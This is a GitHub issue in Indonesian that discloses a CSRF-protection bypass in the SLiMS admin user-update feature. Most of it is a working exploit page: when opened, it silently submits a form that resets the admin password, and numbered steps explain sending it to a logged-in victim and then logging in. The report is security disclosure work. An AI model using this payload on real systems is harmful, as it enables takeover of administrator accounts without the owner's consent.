Skip to content

[SECURITY BUG] Full Account Take Over Via Bypass CSRF Protection On Update Admin Features #103

Open
@jrsfaisal

Description

@jrsfaisal

Halo,

Saya menemukan security bug pada fitur update admin, pada fitur tersebut sudah mempunyai CSRF protections namun dapat di bypass.

Melalui bug ini dan kecerobohan pengguna (admin level) dapat dimanfaatkan oleh attacker untuk mengambil alih akun admin secara penuh.

Proof of concept

  1. Ketika melakukan update data admin sudah terdapat CSRF token.
    6_bypass csrf 1

  2. Namun sayangnya tidak ada pengecekan pada sisi server side untuk mengecek keberadaan parameter csrf_token. Parameter csrf_token dapat dihapus ketika proses POST data, sehingga dapat terbypass protectionnya. Berikut ini merupakan script exploit csrf yang dapat digunakan untuk mengeksploitasi celah ini

<html>
  <body onload="submitRequest()">
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.100.18:81\/slims\/admin\/modules\/system\/app_user.php?changecurrent=true&action=detail&ajaxload=1", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=--------863798609");
        xhr.withCredentials = true;
        var body = "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"form_name\"\r\n" + 
          "\r\n" + 
          "mainForm\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"userName\"\r\n" + 
          "\r\n" + 
          "admin\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"realName\"\r\n" + 
          "\r\n" + 
          "admin\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"userType\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"eMail\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[fb]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[tw]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[li]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[rd]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[pn]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[gp]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[yt]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[bl]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[ym]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"base64picstring\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"passwd1\"\r\n" + 
          "\r\n" + 
          "faisal\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"passwd2\"\r\n" + 
          "\r\n" + 
          "faisal\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"saveData\"\r\n" + 
          "\r\n" + 
          "Update\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"updateRecordID\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "----------863798609--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
  </body>
</html>
  1. Simpan script exploit diatas sebagai html file.

  2. Kirimkan exploit.html kepada korban yang sedang login pada slims miliknya.
    6_bypass csrf 2

  3. Berikut ini merupakan respon dari hasil perubahan data admin.
    6_bypass csrf 3

  4. Setelah berhasil, attacker dapat mengambil alih akun tersebut dengan login ke sistem slims korban menggunakan
    username : admin
    password : faisal

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions